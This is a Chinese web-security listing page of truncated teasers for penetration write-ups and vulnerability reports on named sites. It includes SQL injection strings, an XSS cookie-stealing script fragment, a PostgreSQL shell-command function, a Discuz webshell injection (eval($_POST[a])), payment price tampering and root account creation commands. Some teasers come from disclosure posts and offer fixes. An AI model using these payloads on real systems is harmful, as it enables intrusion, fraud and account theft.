记一次曲折的N点虚拟主机提权 - 网站安全 - 自学关注热度:11

http://www.2cto.com / 199.36.7.232（均为代替目标站）拿shell灰常简单，这里就飘过，欢迎大牛来交流拿shell方法。提权开始。由于探测可得，上传以下马！http://www.2cto.com /inc/yueyan.php php大马....[详情]

驴妈妈旅游网严重支付漏洞 - 网站安全 - 自学p关注热度:13

1这是一个普通的订单：2然后还是抓包修改价格参数3然后的情况就知道了没有支付，如果有人工审核应该会过滤这样的订单的。希望你们有，也希望你们诚实。修复方案：最简单一条：..[详情]

本地元素修改上传拿shell - 网站安全 - 自学php关注热度:20

目标站：http://www.2cto.com /admin/index.asp进后台看看：1.有上传2.有数据库操作3.有系统设置拿shell，我有三种方法1.上传直接上传抓包爆出路径filepath，这里可以考虑NC提交，或者本地修改元素..[详情]

akcms的演示站的注入漏洞及修复 - 网站安全 - 自学关注热度:7

search.php文件存在漏洞，注入入口：http://lishi.akcms.com/search.php?keywords=a%cf#39;+or+1=1如图所示，已经猜解到库：密码hash也出来了：修复方案：在keyword上做过滤，最起码要做addslashes，对于非..[详情]

1ting音乐存储型xss:可致蠕虫,可穷举用户,可暴力破关注热度:9

1. 注册后，xss存在于个人昵称和简介处。个人昵称的长度可手工突破，直接在控制台给个人昵称赋值。注册tmxkorg的账号测试：我的主页效果：http://my.1ting.com/site/58525762. 因为留言是审核..[详情]

XSS获取cookie并利用 - 网站安全 - 自学php关注热度:9

获取cookie利用代码cookie.asphtmltitlexx/titlebody%testfile = Server.MapPath(code.txt) //先构造一个路径，也就是取网站根目录，创造一个在根目录下的code.txt路径，保存在testfile中msg = .....[详情]

关于web渗透中得一些记录 - 网站安全 - 自学php关注热度:12

1. 当得到linux root shell时，采用如下语句可以添加管理员帐户 写道useradd icefish //添加icefish用户passwd icefish //设置密码awk -F: #39;{print $1}#39; /etc/passwd 可以查看有多少用户不.....[详情]

postgresql"初级"注入方法 - 网站安全 - 自学关注热度:10

CREATE FUNCTION id() RETURNS text AS $aaa$open(FD,chr(108).chr(105).chr(32).chr(124));return join(chr(0),FD);$aaa$ LANGUAGE plperlu;select id();id()为创建函数名，可以自定义随便写chr(10.....[详情]

动易xss拿站小记 - 网站安全 - 自学php关注热度:27

对动易CMS的一次XSS攻击以及UDF提权小菜文章~求基友求交流me@startend.net目标检测站点：www.xxoo.net操作系统：WINDOWS2003IIS版本：6.0使用环境:ASP.NET同IP下站点数量：40x001检测IP下站点数量0x00..[详情]

.net文件上传漏洞代码实例及修复方案 - 网站安全关注热度:10

这时在作测试时扒下来的代码有的丢掉了，只有个修补方案。大家凑合着看吧。东西很简单。string str = filename.Substring(filename.LastIndexOf(.) + 1, 3); if (str == png || s.....[详情]

Discuz!X2.5最新版后台管理员权限Getshell及修复 - 网关注热度:32

Discuz!X2.5最新版后台管理员权限Getshell。1.在后台--站长--Ucenter设置处设置UcenterIP为XX\\#39;);eval($_POST[a])?;// XX2.发现管理页面代码出来了3.上菜刀！4.看一下源码，哦，原来是这样的！修复方..[详情]

开心网android客户端暴力破解漏洞 - 网站安全 - 自关注热度:15

开心网的android客户端（接口）存在暴力破解漏洞。使用该客户端（接口）登录，不会限制登录错误的次数，且没有验证码。通过抓包分析，得到登录时候的POST请求为：POST http://api.kaix..[详情]

我买网某分站后台注入 - 网站安全 - 自学php关注热度:17

首先是后台地址泄漏http://tuan.womai.com/groupBuy/listOrderManage.jsp后台登陆地址：http://tuan.womai.com/login.jsp登陆处存在 oracle 注入http://tuan.womai.com/j_spring_security_check?j_password=a.....[详情]

TP-Link官方商城支付漏洞及修复 - 网站安全 - 自学关注热度:12

TP-Link官方网上商城http://www.tp-linkshop.com.cn/存在支付漏洞注册购买路由交换设备后到购物车支付，比如用支付宝支付可以任意篡改交易金额，漏洞等级高。图一图二图三图四图五图六图七..[详情]

网易微博两个存储型XSS - 网站安全 - 自学php关注热度:10

第一个：1、在首页发微博，截获包然后修改。content=testisRetweet=0replyOriginal=0replyIt=0flag=0imageUrl=voteUrl=bbb修改了voteUrl参数为bbb，然后提交。2、回到首页，已经发布了一条微博。但.....[详情]